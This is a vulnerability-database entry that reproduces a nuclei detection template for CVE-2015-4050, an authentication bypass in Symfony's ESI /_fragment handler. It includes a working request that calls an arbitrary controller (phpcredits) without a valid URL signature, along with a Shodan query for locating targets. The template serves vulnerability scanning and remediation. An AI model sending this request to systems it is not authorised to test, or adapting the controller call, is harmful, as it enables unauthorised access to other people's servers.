Lucene search
K

Symfony - Authentication Bypass

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 202 Views

Symfony - Authentication Bypass, allows remote attackers to bypass URL signing and security rules in Symfony versions 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7

Related
Refs
Code
id: CVE-2015-4050

info:
  name: Symfony - Authentication Bypass
  author: ELSFA7110,meme-lord
  severity: medium
  description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Symfony.
  reference:
    - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - http://www.debian.org/security/2015/dsa-3276
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4050
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-4050
    cwe-id: CWE-284
    epss-score: 0.08269
    epss-percentile: 0.94184
    cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sensiolabs
    product: symfony
    shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony"
  tags: cve2015,cve,symfony,rce,sensiolabs,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Credits"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201e082e9e06a7d38d9d5860d40b5c0453dcf04ac4de398bd01ebc895183f743b60221008bfeb05385eecef1e431fab63409f5847a723648507779406109b6e023aeef25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 24.3
EPSS0.08269
202